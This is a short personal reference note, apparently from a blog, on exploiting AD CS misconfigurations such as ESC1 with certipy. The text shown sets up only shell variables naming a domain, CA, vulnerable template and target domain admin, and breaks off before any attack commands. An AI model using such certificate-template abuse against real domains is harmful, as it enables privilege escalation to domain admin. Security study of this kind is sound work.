Misconfigurations

These are some scribbles if I ever need to look up how to exploit AD CS misconfigurations, such as ESC1. I might expand on this later…​ Note This is nothing new, most of this stuff can be easily found on the Internet. This is just for my own reference. Please excuse my brevity. Environment For this article, we’re assuming the following (YMMV): user $ echo $SHELL /usr/bin/fish user $ which certipy /usr/bin/certipy user $ which dasel /usr/bin/dasel user $ set win_domain company.org user $ set dc_fqdn dc.{$win_domain} user $ set dc_ip 192.168.1.1 user $ set ca_fqdn ca.{$win_domain} user $ set ca_ip 192.168.1.10 user $ set ca_name COMPANYCA user $ set esc1_template_name ESC1Template user $ set regular_ad_user gijsbert user $ set domain_admin dawilbert user $ set domain_admin_upn {$domain_admin}@{$win_domain}...